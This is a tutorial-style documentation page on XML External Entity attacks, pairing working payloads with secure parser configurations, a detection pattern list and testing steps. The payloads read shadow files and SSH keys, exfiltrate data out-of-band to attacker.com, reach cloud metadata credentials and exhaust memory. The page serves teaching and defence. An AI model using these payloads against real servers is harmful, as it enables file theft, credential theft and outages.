Documentation

# XML External Entity (XXE) Attacks

CRITICAL SEVERITY FILE DISCLOSURE XML INJECTION

XXE Attack Illustration
XXE Attack Illustration

Imagine filling out a form that asks for your name, but instead of writing "John," you write "Please read the contents of the safe behind you and write it here" - and the clerk actually does it. That's XML External Entity (XXE) in a nutshell.

XXE attacks exploit how computers process XML files. When you upload a specially crafted XML file, the server reads it and unknowingly executes malicious instructions embedded within, like reading sensitive files or making network requests you shouldn't be able to make.

Simple Example: You upload an innocent-looking XML file to a website. Hidden in that file is an instruction that says "Read /etc/passwd file." The server obediently reads the file and includes its contents in the response - giving you access to system files you should never see.


# What is XXE? (In Simple Terms)

XML (eXtensible Markup Language) is a way to structure data, kind of like HTML. It looks like this:

<person>
    <name>John</name>
    <age>30</age>
</person>

Entities in XML are like variables or shortcuts. You can define them like this:

<!ENTITY company "Acme Corp">
<message>Welcome to &company;</message>

When processed, &company; gets replaced with "Acme Corp".

External Entities can reference files or URLs:

<!ENTITY external SYSTEM "file:///etc/passwd">
<data>&external;</data>

# Real-World Analogies

You're filling out a form at a government office. In the "Name" field, instead of writing your name, you write: "Copy the contents of File #1234 into this field." If the clerk follows instructions blindly, they'll read a confidential file and write it on your form for you to see.

You hand someone a document to copy. Hidden in your document is an instruction: "Go to the filing cabinet, retrieve Document X, and make a copy for this person." If they follow embedded instructions without thinking, they'll give you documents you shouldn't have access to.

Mad Libs asks you to fill in blanks: "The ___ ran to the ___." Normally you write words. But what if you write "contents of my diary" in the blank? If the Mad Libs book could actually fetch and insert your diary contents, that's XXE - using a placeholder to inject external content.


# How XXE Works (The Step-by-Step Story)

Let's see how a typical XXE attack unfolds:

Scenario: Website with XML File Upload

<!-- User uploads normal XML -->
<?xml version="1.0"?>
<order>
    <item>Laptop</item>
    <quantity>1</quantity>
</order>

Server processes it normally and displays: "Order received: 1 Laptop"

<!-- Hacker uploads this -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order>
    <item>&xxe;</item>
    <quantity>1</quantity>
</order>
  1. Parser sees <!ENTITY xxe SYSTEM "file:///etc/passwd">
  2. Parser defines entity "xxe" that references /etc/passwd
  3. Parser sees &xxe; in the XML
  4. Parser reads /etc/passwd file
  5. Parser replaces &xxe; with file contents
Order received: 1 root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

The hacker just read the server's password file!


# Types of XXE Attacks

# 1. Classic XXE (File Disclosure)

FILE ACCESS DATA THEFT

What it is: Reading files from the server's filesystem.

Attack Example:

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<userInfo>
  <firstName>&file;</firstName>
</userInfo>

Files Hackers Target:

[Linux Systems]
<!ENTITY file SYSTEM "file:///etc/passwd">       <!-- User accounts -->
<!ENTITY file SYSTEM "file:///etc/shadow">       <!-- Password hashes -->
<!ENTITY file SYSTEM "file:///etc/hosts">        <!-- Network configuration -->
<!ENTITY file SYSTEM "file:///proc/self/environ"> <!-- Environment variables -->
<!ENTITY file SYSTEM "file:///var/log/apache2/access.log"> <!-- Logs -->
<!ENTITY file SYSTEM "file:///root/.ssh/id_rsa"> <!-- SSH keys -->
[Windows Systems]
<!ENTITY file SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
<!ENTITY file SYSTEM "file:///C:/Users/Administrator/.ssh/id_rsa">
<!ENTITY file SYSTEM "file:///C:/inetpub/wwwroot/web.config">
[Application Files]
<!ENTITY file SYSTEM "file:///var/www/html/config.php">  <!-- Database passwords -->
<!ENTITY file SYSTEM "file:///app/secrets.json">         <!-- API keys -->
<!ENTITY file SYSTEM "file:///.env">                     <!-- Environment config -->

Vulnerable Code:

[Python - Vulnerable]
from lxml import etree

xml_data = request.files['upload'].read()

# Default settings allow external entities!
parser = etree.XMLParser()
tree = etree.fromstring(xml_data, parser)

# Attacker can read any file the server can access
[Java - Vulnerable]
// Java - VULNERABLE
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// External entities enabled by default!
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(new InputSource(new StringReader(xmlData)));
[PHP - Vulnerable]
// PHP - VULNERABLE
// libxml_disable_entity_loader is deprecated but still used
libxml_disable_entity_loader(false);  // DANGEROUS!
$xml = simplexml_load_string($xmlData);

# 2. Blind XXE (No Direct Output)

STEALTHY OUT-OF-BAND

What it is: The application processes XML but doesn't return the parsed data to you. You need to exfiltrate data out-of-band.

Attack Method - Out-of-Band Exfiltration:

Create file at http://attacker.com/evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/log?data=%file;'>">
%eval;
%exfiltrate;
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<data>test</data>

What happens:

  1. Server parses your XML
  2. Server fetches evil.dtd from your server
  3. evil.dtd reads /etc/passwd
  4. evil.dtd makes HTTP request to attacker.com with file contents in URL
  5. You receive the data in your server logs:

    GET /log?data=root:x:0:0:root:/root:/bin/bash... HTTP/1.1

# 3. XXE to SSRF

NETWORK ACCESS INTERNAL SYSTEMS

What it is: Using XXE to make the server send requests to internal systems.

Attack:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://localhost:8080/admin">
]>
<data>&xxe;</data>
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&xxe;</data>

# 4. Billion Laughs (XXE DoS)

DENIAL OF SERVICE RESOURCE EXHAUSTION

What it is: Denial of Service through exponential entity expansion.

Attack:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

What Happens:

  • lol9 expands to 10 lol8's
  • Each lol8 expands to 10 lol7's
  • This continues...
  • Final expansion: 3 billion "lol" strings
  • Server runs out of memory and crashes

# 5. XXE in Different File Formats

HIDDEN XXE

XXE isn't just in .xml files. Many file formats use XML internally:

1. Create malicious XXE in word/document.xml
2. Zip it as .docx
3. Upload to document processor
4. XXE executes when opened
1. Malicious XML in xl/worksheets/sheet1.xml
2. Same attack as DOCX
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="500" height="500">
  <text x="0" y="16">&xxe;</text>
</svg>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <!DOCTYPE foo [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
  ]>
  <soap:Body>
    <getUserInfo>
      <userId>&xxe;</userId>
    </getUserInfo>
  </soap:Body>
</soap:Envelope>

# Real-World Attack Scenarios

# Scenario 1: Facebook XXE Vulnerability (2014)

$30K BOUNTY RESPONSIBLE DISCLOSURE

The Setup:

  • Facebook allowed uploading office documents
  • Documents were processed server-side for preview
  • DOCX files contain XML

The Attack:

Researcher created DOCX with XXE payload

XXE payload read internal files

Could access:

  • Internal network configurations
  • Source code
  • Configuration files

Impact:

  • Reported through bug bounty
  • Facebook paid $30,000 reward
  • Vulnerability patched quickly

# Scenario 2: Google's XXE in XML Editor

CLIENT-SIDE XXE

The Attack:

  • Google Toolbar used XML for configuration
  • XML editor didn't disable external entities

Attack Payload:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///c:/boot.ini">
]>
<config>&xxe;</config>

Result:

  • Could read local files from user's computer
  • Patched after responsible disclosure

# Scenario 3: IRS E-Filing XXE (2018)

GOVERNMENT SYSTEM TAX DATA

The Setup:

  • IRS tax filing system accepted XML
  • Used for business tax returns
  • Inadequate XXE protection

Potential Attack:

<!-- Tax return XML -->
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<TaxReturn>
  <BusinessName>&xxe;</BusinessName>
</TaxReturn>

Impact:

  • Could have accessed sensitive tax data
  • Found by security researchers
  • Government patched before exploitation

# Scenario 4: WordPress Plugin XXE

MASS EXPLOITATION WORDPRESS

:icon-wordpress: The Vulnerability:

  • Popular WordPress plugin processed XML feeds
  • RSS/Atom feed parser had XXE vulnerability

Attack:

<!-- Malicious RSS feed -->
<?xml version="1.0"?>
<!DOCTYPE rss [
  <!ENTITY xxe SYSTEM "file:///var/www/html/wp-config.php">
]>
<rss version="2.0">
  <channel>
    <title>&xxe;</title>
  </channel>
</rss>

Result:

  • Exposed WordPress database credentials
  • Affected thousands of websites
  • Emergency patch released

# Advanced XXE Techniques

# 1. PHP Expect Wrapper (Remote Code Execution)

RCE

If PHP's expect module is loaded:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "expect://id">
]>
<data>&xxe;</data>

# 2. Parameter Entities for Blind XXE

ADVANCED

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
  %all;
]>
<foo>&send;</foo>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">

# 3. UTF-7 Encoding Bypass

FILTER EVASION

Some filters check for <!ENTITY but miss encoded versions:

<?xml version="1.0" encoding="UTF-7"?>
+ADw-+ACE-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI +AD4

# 4. XInclude Attacks

ALTERNATIVE METHOD

When you can't control DTD but can control XML content:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

# Prevention and Mitigation

# 1. Disable External Entities (Primary Defense)

PRIMARY DEFENSE

[Python (lxml) - Secure]
from lxml import etree

# SECURE: Disable external entities
parser = etree.XMLParser(
    resolve_entities=False,  # Don't resolve entities
    no_network=True,         # No network access
    load_dtd=False           # Don't load DTD
)

xml_data = request.files['upload'].read()
tree = etree.fromstring(xml_data, parser)
[Java - Secure]
import javax.xml.parsers.DocumentBuilderFactory;

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

// SECURE: Disable all the things
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);

DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(new InputSource(new StringReader(xmlData)));
[PHP - Secure]
<?php
// SECURE: Disable external entities
libxml_disable_entity_loader(true);

// Even better: use simplexml with LIBXML_NOENT disabled
$xml = simplexml_load_string(
    $xmlData,
    'SimpleXMLElement',
    LIBXML_NOCDATA | LIBXML_NONET
);
?>
[Node.js - Secure]
const libxmljs = require('libxmljs');

// SECURE: Disable external entities
const xml = libxmljs.parseXml(xmlData, {
    noent: false,    // Don't substitute entities
    nonet: true,     // No network access
    dtdload: false,  // Don't load DTD
    dtdvalid: false  // Don't validate against DTD
});
[.NET - Secure]
using System.Xml;

XmlReaderSettings settings = new XmlReaderSettings();

// SECURE: Disable DTD processing
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;

using (XmlReader reader = XmlReader.Create(stream, settings))
{
    XmlDocument doc = new XmlDocument();
    doc.Load(reader);
}

# 2. Use Simple Data Formats

RECOMMENDED

Avoid XML When Possible:

<order>
  <item>Laptop</item>
  <quantity>1</quantity>
</order>
{
  "order": {
    "item": "Laptop",
    "quantity": 1
  }
}

# 3. Input Validation

DEFENSE IN DEPTH

import re

def validate_xml(xml_string):
    """Check for suspicious XML content"""

    dangerous_patterns = [
        r'<!ENTITY',
        r'<!DOCTYPE',
        r'SYSTEM',
        r'PUBLIC',
        r'file://',
        r'http://',
        r'https://',
        r'expect://',
        r'php://'
    ]

    for pattern in dangerous_patterns:
        if re.search(pattern, xml_string, re.IGNORECASE):
            raise ValueError(f"Suspicious XML content: {pattern}")

    return True

# Usage
xml_data = request.files['upload'].read()
validate_xml(xml_data)  # Throws error if malicious

# 4. Use Modern XML Libraries

RECOMMENDED

Recommended Libraries:

defusedxml - Secure XML library specifically for preventing attacks

import defusedxml.ElementTree as ET

# Automatically prevents XXE, billion laughs, etc.
tree = ET.parse('file.xml')

Use latest versions with secure defaults or consider using JSON instead

fast-xml-parser with safe defaults. Better: use JSON

# 5. Least Privilege

INFRASTRUCTURE

[Create Limited User]
# Run application with limited permissions
# Can't read /etc/passwd if process doesn't have permission

# Create limited user
useradd -r -s /bin/false xmlapp

# Run app as limited user
su -s /bin/sh xmlapp -c 'node server.js'
[File Permissions]
# Application files should not be readable by app user
chmod 640 /app/config/database.yml
chown root:root /app/config/database.yml

# App runs as 'xmlapp' user
# Even if XXE exists, can't read config files

# Testing for XXE Vulnerabilities

# Manual Testing

TESTING GUIDE

  • File uploads (.xml, .docx, .xlsx, .svg)
  • API endpoints accepting XML
  • SOAP web services
  • RSS/Atom feed parsers
  • Configuration file uploads

Upload this XML:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY test "Hello XXE">
]>
<data>&test;</data>

If response contains "Hello XXE", entities are processed.

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<data>&xxe;</data>

Check if hostname appears in response.

Set up listener:

nc -lvp 9001

Upload XML:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://YOUR-IP:9001/test">
]>
<data>&xxe;</data>

If you receive connection, blind XXE exists.

# Automated Tools

[XXEinjector]
# Test for XXE
ruby XXEinjector.rb --host=192.168.1.100 --path=/upload --file=/tmp/test.xml --oob=http --phpfilter

# Enumerate files
ruby XXEinjector.rb --host=target.com --file=request.txt --enumeration
[Burp Suite]
1. Capture XML request
2. Send to Intruder
3. Insert XXE payloads
4. Analyze responses
[Custom Test Script]
import requests

url = "http://target.com/upload"

# Test payloads
payloads = [
    # Basic entity
    '''<?xml version="1.0"?>
    <!DOCTYPE foo [<!ENTITY test "XXE_WORKS">]>
    <data>&test;</data>''',

    # File disclosure
    '''<?xml version="1.0"?>
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
    <data>&xxe;</data>''',

    # Out-of-band
    '''<?xml version="1.0"?>
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/xxe">]>
    <data>&xxe;</data>'''
]

for i, payload in enumerate(payloads):
    response = requests.post(url, data=payload, headers={'Content-Type': 'application/xml'})

    print(f"Payload {i+1}:")
    print(f"Status: {response.status_code}")
    print(f"Response: {response.text[:200]}")
    print("-" * 50)

# Summary: What You Need to Remember

XML External Entity (XXE) exploits how XML parsers process external references. By uploading specially crafted XML, attackers can read server files, make internal network requests, or crash the server through resource exhaustion.

The Simple Version:

  • What it is: Tricking XML parser into reading files or making requests by embedding malicious entity references
  • Why it's dangerous: Can read sensitive files (passwords, keys), access internal systems (SSRF), or crash servers (DoS)
  • How to prevent it: Disable external entity processing in XML parsers, use JSON instead of XML

Real-World Impact:

  • Facebook: Internal file disclosure (2014) - $30K bug bounty
  • IRS: Tax system vulnerability (2018)
  • :icon-wordpress: WordPress: Mass exploitation through plugins

Common Targets: Configuration files, password files, SSH keys, source code

# Quick Protection Checklist

For Website Owners & Developers:

DO Disable external entity processing in all XML parsers DO Disable DTD (Document Type Definition) processing DO Use simple data formats (JSON) instead of XML when possible DO Use secure XML libraries (defusedxml, latest versions) DO Run application with least privilege DO Validate and sanitize XML input DO Keep XML processing libraries updated

DON'T Allow external entity resolution in XML parsers DON'T Process untrusted XML with default parser settings DON'T Return raw XML parsing errors to users DON'T Trust office documents (.docx, .xlsx) - they contain XML DON'T Allow DTD declarations in user-supplied XML

For Regular Users:

TIP Be cautious uploading XML files to untrusted sites - they could test for XXE TIP XXE mainly affects servers, not end users directly TIP If you manage systems, audit all XML-processing code


# Additional Resources


Last updated: November 2025